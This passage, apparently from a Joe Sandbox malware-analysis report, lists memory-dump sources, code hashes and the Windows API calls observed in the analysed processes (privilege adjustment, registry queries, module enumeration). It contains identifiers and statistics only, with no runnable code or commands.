                                  • Instruction ID: 44316b20ccf0baa3595b955a128056bead5c2d949d2b9121ad8c580398809a25
                                  • Opcode Fuzzy Hash: 8b2d2afdf8cc5b7ccea18ced03ba7a08bcfe8e2e892637580233587e30185cdd
                                  • Instruction Fuzzy Hash: C7E00936050114AFCB069F80DD48D95BFAAFB5C710B0A8095F6084A032C672D560EB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9427584c77b207b8fea4f4d6ab8bb60ee93fe0f6f58bdd6edfadef7dd3572ef8
                                  • Instruction ID: 0106595f11186e954e1a548811cb14e74e1f99e42e1dab80e1fda59fc7fb9bec
                                  • Opcode Fuzzy Hash: 9427584c77b207b8fea4f4d6ab8bb60ee93fe0f6f58bdd6edfadef7dd3572ef8
                                  • Instruction Fuzzy Hash: 8CC012223096340B0E1E72B8192367E394A4A859A8715043DE21F9B391DF1E9E4282FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 271df17471905d136853b43dee42a8f56c4fda744a12c413f63b199740af0e29
                                  • Instruction ID: 881fd522d186c7ed35f509b46998b6f1ef01e14841a75ae8c3b12b1c90cf240b
                                  • Opcode Fuzzy Hash: 271df17471905d136853b43dee42a8f56c4fda744a12c413f63b199740af0e29
                                  • Instruction Fuzzy Hash: A6C012380102088BC7146B90FE0CA2A73A9F70730AF040264A20E129B28BB02880CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3421532083cf676120462fdf1a452ed5705107a8031140d5b694646c08ac1405
                                  • Instruction ID: 319f3b9c0c625bfb564770ff4316b01b51c607203eac85e46602016c68d3584c
                                  • Opcode Fuzzy Hash: 3421532083cf676120462fdf1a452ed5705107a8031140d5b694646c08ac1405
                                  • Instruction Fuzzy Hash: D421EAB5E006288BDB68CF6B9D0068AFAF3AFC9305F14C1FB950CA7254DB301A858F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:12.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:19.4%
                                  Total number of Nodes:31
                                  Total number of Limit Nodes:1

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 001BAAFF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: 49efeeb4f5463c777722a3ce40e99b9bb9e13812686d50f0c9e219b008da2d92
                                  • Instruction ID: 919839d79aeac84f295809f255591ddf32263e0e0211c665d14f72ba26b322c1
                                  • Opcode Fuzzy Hash: 49efeeb4f5463c777722a3ce40e99b9bb9e13812686d50f0c9e219b008da2d92
                                  • Instruction Fuzzy Hash: 8F21A1755097849FDB128F25DC45B92BFB4EF06310F0885DAE9858B163D375A908CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 001BAAFF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: fea4778b81c337090bbfbfd1c2440df71b3bacb1ab42df86ff14e1f6db9c7aeb
                                  • Instruction ID: 0ca18966bd47b0352ecc5da79db809ca951afe2b36310dcbc285c097b00cbc61
                                  • Opcode Fuzzy Hash: fea4778b81c337090bbfbfd1c2440df71b3bacb1ab42df86ff14e1f6db9c7aeb
                                  • Instruction Fuzzy Hash: 3711C2355003009FEB21CF65D984BA6FBE4EF04320F08C5AADD498B651D371E404DF62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001BA5C9
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: a8f326cd72596b355fdce5840f5505d932ea07d8cc9237b8fd8f2944ec89fef1
                                  • Instruction ID: ee209214540295c68d615efb6fd082354574cc1861e1e08e1fcbecfe940b9e47
                                  • Opcode Fuzzy Hash: a8f326cd72596b355fdce5840f5505d932ea07d8cc9237b8fd8f2944ec89fef1
                                  • Instruction Fuzzy Hash: 1F3181B2508344AFE7228B15DC84FA6BFBCEF46314F08859BE985CB152D364A949CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BA6CC
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 47cd97ca4602a10877d2ec2445e051bd2aad0e352f147a98b895bd696805626d
                                  • Instruction ID: 74772fffa3838a59f15f2044024c2da5f975cf1767f1e0a56747b2ccc0f761c0
                                  • Opcode Fuzzy Hash: 47cd97ca4602a10877d2ec2445e051bd2aad0e352f147a98b895bd696805626d
                                  • Instruction Fuzzy Hash: 34319375505784AFE722CB21CC85FA2BFF8EF46314F08849AE989CB152D364E949CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  • control_flow_graph 32 1bacec-1bad7e 37 1badcb-1badd0 32->37 38 1bad80-1bad88 K32EnumProcessModules 32->38 37->38 40 1bad8e-1bada0 38->40 41 1badd2-1badd7 40->41 42 1bada2-1badc8 40->42 41->42
                                  APIs
                                  • K32EnumProcessModules.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BAD86
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: EnumModulesProcess
                                  • String ID:
                                  • API String ID: 1082081703-0
                                  • Opcode ID: 82fc3130bbc23808a0ff4bcc21dbe8cdeb84aed569157ef2b4deaf65abb11973
                                  • Instruction ID: 00bfe68c17bbe6ff7621ac6e99c3a048257ec0cb438d630339985b0f5383bcbf
                                  • Opcode Fuzzy Hash: 82fc3130bbc23808a0ff4bcc21dbe8cdeb84aed569157ef2b4deaf65abb11973
                                  • Instruction Fuzzy Hash: FE21E9B25053806FE7128B64DC44BA6BFB8EF46324F0885DBE985DB193D3249949CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  • control_flow_graph 45 1bade5-1bae4f 49 1bae51 45->49 50 1bae54-1bae6e 45->50 49->50 52 1baebb-1baec0 50->52 53 1bae70-1bae78 K32GetModuleInformation 50->53 52->53 55 1bae7e-1bae90 53->55 56 1baec2-1baec7 55->56 57 1bae92-1baeb8 55->57 56->57
                                  APIs
                                  • K32GetModuleInformation.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BAE76
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: InformationModule
                                  • String ID:
                                  • API String ID: 3425974696-0
                                  • Opcode ID: 21817bb224c2f58063c5a26fbe948ddac9f1dfc8b3030a4bc9a0f76d7832fe45
                                  • Instruction ID: f9b0a11abbc03ff6216b19eb0900c93ac1b3135b26ef9b94b6eaacfa5e4cbf81
                                  • Opcode Fuzzy Hash: 21817bb224c2f58063c5a26fbe948ddac9f1dfc8b3030a4bc9a0f76d7832fe45
                                  • Instruction Fuzzy Hash: BE21A671505344AFE711CB55DC44FA6BFACEF46320F08849AE945CB152D374E949CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  • control_flow_graph 60 1baedc-1baf2f 62 1baf32-1baf84 K32GetModuleBaseNameW 60->62 64 1baf8a-1bafb3 62->64
                                  APIs
                                  • K32GetModuleBaseNameW.KERNEL32(?,00000E40,?,?), ref: 001BAF82
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: BaseModuleName
                                  • String ID:
                                  • API String ID: 595626670-0
                                  • Opcode ID: 8ea459e5e5fe8d207ad3f44cc9e9a8539b016c978e7baa754cc9a5200aec516a
                                  • Instruction ID: fc3046483f391f387d744c686e4719a999ce770cb45e4740e480184224665b74
                                  • Opcode Fuzzy Hash: 8ea459e5e5fe8d207ad3f44cc9e9a8539b016c978e7baa754cc9a5200aec516a
                                  • Instruction Fuzzy Hash: 4821B1715093C06FD312CB65CC55B66BFB8EF87210F0984DBE8888F293D224A909C7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  • control_flow_graph 66 1ba722-1ba76b 67 1ba76e-1ba7c6 RegQueryValueExW 66->67 69 1ba7cc-1ba7e2 67->69
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 001BA7BE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 262d7a61651187058349001195a8a07bba35842f867805634d24a33437343b0d
                                  • Instruction ID: e68295efb1a5944d23326f2e054e9f1d747aa1389febe4f5233d76c0885fd5c4
                                  • Opcode Fuzzy Hash: 262d7a61651187058349001195a8a07bba35842f867805634d24a33437343b0d
                                  • Instruction Fuzzy Hash: F721F57554D3C06FD3138B259C51B62BFB8EF87610F0981DBE8888B693D225691AC7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  • control_flow_graph 83 1ba54a-1ba5a5 86 1ba5aa-1ba5c1 83->86 87 1ba5a7 83->87 89 1ba603-1ba608 86->89 90 1ba5c3-1ba5d6 RegOpenKeyExW 86->90 87->86 89->90 91 1ba60a-1ba60f 90->91 92 1ba5d8-1ba600 90->92 91->92
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001BA5C9
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: ea056c56e1f99841572ded07ea7f6d700c38cb1ee5b05661720c3c761e9c3e01
                                  • Instruction ID: 4045d37ff0a1fdc32aee44d9e7bca8f0494dff739f0269b4d2c868954b4f4cff
                                  • Opcode Fuzzy Hash: ea056c56e1f99841572ded07ea7f6d700c38cb1ee5b05661720c3c761e9c3e01
                                  • Instruction Fuzzy Hash: FE21A472500204AFFB21DF55DC84FAAFBECEF44320F04855AE945C6241D774E6098B75
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  • control_flow_graph 97 1ba652-1ba68f 99 1ba691 97->99 100 1ba694-1ba69d 97->100 99->100 101 1ba69f 100->101 102 1ba6a2-1ba6a8 100->102 101->102 103 1ba6aa 102->103 104 1ba6ad-1ba6c4 102->104 103->104 106 1ba6fb-1ba700 104->106 107 1ba6c6-1ba6d9 RegQueryValueExW 104->107 106->107 108 1ba6db-1ba6f8 107->108 109 1ba702-1ba707 107->109 109->108
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BA6CC
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 307dbbd0b1eec1ec6e2632cd5c84b72ab01b52cbb0447d9cf37f56e65f8e6d79
                                  • Instruction ID: 0e4281c30b8193b467b2e2b110ba5125f6f006c953bbd87004478004262a1277
                                  • Opcode Fuzzy Hash: 307dbbd0b1eec1ec6e2632cd5c84b72ab01b52cbb0447d9cf37f56e65f8e6d79
                                  • Instruction Fuzzy Hash: 7221AFB6600604AFE721CF15CC84FA6F7ECEF48720F08856AE949CB251D774E949CA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  • control_flow_graph 113 1bae12-1bae4f 115 1bae51 113->115 116 1bae54-1bae6e 113->116 115->116 118 1baebb-1baec0 116->118 119 1bae70-1bae78 K32GetModuleInformation 116->119 118->119 121 1bae7e-1bae90 119->121 122 1baec2-1baec7 121->122 123 1bae92-1baeb8 121->123 122->123
                                  APIs
                                  • K32GetModuleInformation.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BAE76
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: InformationModule
                                  • String ID:
                                  • API String ID: 3425974696-0
                                  • Opcode ID: 78651bab0f6ee68c5c01017b552075251c5ada576b6b056e5e81d4d0acdcf1ca
                                  • Instruction ID: 306f130e8357d64f37ee5821e15fc9dab80605dbdc7b93324e21100cfa04a163
                                  • Opcode Fuzzy Hash: 78651bab0f6ee68c5c01017b552075251c5ada576b6b056e5e81d4d0acdcf1ca
                                  • Instruction Fuzzy Hash: D2119375600204AFFB21CF55DC85FA6BBE8EF44720F14856AED49CB241D774E9098B72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  • control_flow_graph 126 1ba873-1ba8c1 128 1ba8c3 126->128 129 1ba8c6-1ba8cc 126->129 128->129 130 1ba8ce 129->130 131 1ba8d1-1ba8da 129->131 130->131 132 1ba91d-1ba922 131->132 133 1ba8dc-1ba8e4 LookupPrivilegeValueW 131->133 132->133 134 1ba8ea-1ba8fc 133->134 136 1ba8fe-1ba91a 134->136 137 1ba924-1ba929 134->137 137->136
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 001BA8E2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 164ff5a53700484a39f9220119704921608b2a60d22c38b8078955c0782fc64d
                                  • Instruction ID: 1e250d1a054a4f2462e8e417dc45ddd726702f8bf4536e526794e29c2efed1c4
                                  • Opcode Fuzzy Hash: 164ff5a53700484a39f9220119704921608b2a60d22c38b8078955c0782fc64d
                                  • Instruction Fuzzy Hash: 592145715053805FD721CF25DC44B62BFA8EF46624F0884AAED85CB652D375E804DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  • control_flow_graph 139 1bad2a-1bad7e 142 1badcb-1badd0 139->142 143 1bad80-1bad88 K32EnumProcessModules 139->143 142->143 145 1bad8e-1bada0 143->145 146 1badd2-1badd7 145->146 147 1bada2-1badc8 145->147 146->147
                                  APIs
                                  • K32EnumProcessModules.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BAD86
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: EnumModulesProcess
                                  • String ID:
                                  • API String ID: 1082081703-0
                                  • Opcode ID: 1dfe5764aded46336065cd276073368ac1ea34ff115468137c927c8529175a3d
                                  • Instruction ID: df7d2c4d2589b6df159ee90db105cf99b7ce8c7327d51b156804c8f34eb559e4
                                  • Opcode Fuzzy Hash: 1dfe5764aded46336065cd276073368ac1ea34ff115468137c927c8529175a3d
                                  • Instruction Fuzzy Hash: B911C472500204AFFB61CF55DC85FA6FBE8EF44320F14856AEE49CA641D774A9058BB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  • control_flow_graph 150 1ba89a-1ba8c1 151 1ba8c3 150->151 152 1ba8c6-1ba8cc 150->152 151->152 153 1ba8ce 152->153 154 1ba8d1-1ba8da 152->154 153->154 155 1ba91d-1ba922 154->155 156 1ba8dc-1ba8e4 LookupPrivilegeValueW 154->156 155->156 157 1ba8ea-1ba8fc 156->157 159 1ba8fe-1ba91a 157->159 160 1ba924-1ba929 157->160 160->159
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 001BA8E2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 75e3532d2d1b7a741bfe5bdad06aa29b158adbee846cd047982d840a2ee58337
                                  • Instruction ID: 06a5e0f706af8ce30b19422726feb005e74777f7697bccae1bdf3c20e37994f1
                                  • Opcode Fuzzy Hash: 75e3532d2d1b7a741bfe5bdad06aa29b158adbee846cd047982d840a2ee58337
                                  • Instruction Fuzzy Hash: D11130766002009BEB50CF25D8857A6BBE8EF44721F08846ADD49CB641E375E905DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  • control_flow_graph 172 1baf32-1baf84 K32GetModuleBaseNameW 174 1baf8a-1bafb3 172->174
                                  APIs
                                  • K32GetModuleBaseNameW.KERNEL32(?,00000E40,?,?), ref: 001BAF82
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: BaseModuleName
                                  • String ID:
                                  • API String ID: 595626670-0
                                  • Opcode ID: a9e7f96637b1b7b9831328a63b843e09836788ec6e701a4b5b7eddb0ecfadc31
                                  • Instruction ID: d72d6e148e69b0bf67faeb85cd10f9882a55ec0b3aa4f49c5c18eea5fcbefa98
                                  • Opcode Fuzzy Hash: a9e7f96637b1b7b9831328a63b843e09836788ec6e701a4b5b7eddb0ecfadc31
                                  • Instruction Fuzzy Hash: FC017171A40200ABE710DF16DC85B66FBA8FF84A20F14856AED089B745D231B516CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 001BA7BE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 4c84c80ab7c837484de3af77e0d0b203d525813cb28d8b2247a7feed27056afa
                                  • Instruction ID: 536c551b117c3df3aee77408e8714d7480aca3bfb7eeb1c9059a6e646ef0cbc8
                                  • Opcode Fuzzy Hash: 4c84c80ab7c837484de3af77e0d0b203d525813cb28d8b2247a7feed27056afa
                                  • Instruction Fuzzy Hash: D8016271A40204ABE210DF16DC86B26FBA8FF88B20F14815AED085B745D271F516CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 001BABB8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 3b0de3c00c6850b13f316580a4b1e6866aac3fded5cb4957e4beccfb58d28b02
                                  • Instruction ID: a4108cae10f7d51b9475fb5f00e269d6b8e1f8eb67b847cfc5eca79f9f73a8d6
                                  • Opcode Fuzzy Hash: 3b0de3c00c6850b13f316580a4b1e6866aac3fded5cb4957e4beccfb58d28b02
                                  • Instruction Fuzzy Hash: 3421A1725093C09FDB028B25DD94692BFB4AF07324F0984DBED858F263D2659908CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 001BA378
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: d4ebc9db406dec2fd5e2ab84040e89bd16c244c2c41dcc0e85dc41ae62c44683
                                  • Instruction ID: a22e9d305645952735878e5f39973daf3fa255a0c677898f369df6a6d94aad29
                                  • Opcode Fuzzy Hash: d4ebc9db406dec2fd5e2ab84040e89bd16c244c2c41dcc0e85dc41ae62c44683
                                  • Instruction Fuzzy Hash: 1C2181715093C49FD7128B25DC95791BFB4EF46224F0884EBDD858F6A2D334A908CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 001BABB8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 273af7938bc3a36022fdfa0bb0a41d79bd6efdeec4e8219a84f45a929069d09c
                                  • Instruction ID: a25f075392bfa20cb02486c342460e7dd4b19fb2372f431a1f4972cbed88eeb8
                                  • Opcode Fuzzy Hash: 273af7938bc3a36022fdfa0bb0a41d79bd6efdeec4e8219a84f45a929069d09c
                                  • Instruction Fuzzy Hash: 0401DF765002408BEB10CF29D984792FBA4EF40320F08C0AADD498B342D375E848CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 001BA378
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: f758074a0742fb09d47d6561b3890d1347126e64544b1fb1721877b6373f0296
                                  • Instruction ID: aa26f8f0ad670b8714fe74cc76b4fdfe6e843062b82f6197f75afa6823960b33
                                  • Opcode Fuzzy Hash: f758074a0742fb09d47d6561b3890d1347126e64544b1fb1721877b6373f0296
                                  • Instruction Fuzzy Hash: 7801DF755002409FEB118F25D8847A5FBE4EF44320F48C4ABDD49CB352D378A904CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027139395.0000000000250000.00000040.00000020.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_250000_powershell_ise.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e9f6bc3d00a3b40f37b57e1a99ab47a7d6f641c6c62f3a800f59c0730603e2e9
                                  • Instruction ID: 6870fad21923e9758152474c6b93d1c239901706c5f7f617e78b1f6f6ca93ae3
                                  • Opcode Fuzzy Hash: e9f6bc3d00a3b40f37b57e1a99ab47a7d6f641c6c62f3a800f59c0730603e2e9
                                  • Instruction Fuzzy Hash: 3AF0AEB65093806FD7128B15AC40863FFB8EF86630709C4AFED4D8B611D129B909CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027139395.0000000000250000.00000040.00000020.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_250000_powershell_ise.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37e75f24cc9b75ed20092755f748b243df1539636d3eb226d19e7df94b701d5d
                                  • Instruction ID: 9ce943b1bd5722e7123ce363fa4e5d4deae375218dca6f429be91a260d3bd4c0
                                  • Opcode Fuzzy Hash: 37e75f24cc9b75ed20092755f748b243df1539636d3eb226d19e7df94b701d5d
                                  • Instruction Fuzzy Hash: 91E092B66047009BD650CF0AEC81462F7A4EF84630B08C47FDD0D8B700E13AB509CAA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027082920.00000000001B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B2000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1b2000_powershell_ise.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d548195a0970d3a48c08a498fc1e4221a1f559e881570dc34d3c9d6188093f96
                                  • Instruction ID: 9f2413869de2e98d4da0069d94564d29b6d043073665f3335afa3e74b4bbc6f8
                                  • Opcode Fuzzy Hash: d548195a0970d3a48c08a498fc1e4221a1f559e881570dc34d3c9d6188093f96
                                  • Instruction Fuzzy Hash: DCD05E793046814FE7169B1CC1A4BD53BD4AF91B05F5644FAE844CBAA3C378D985D200
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
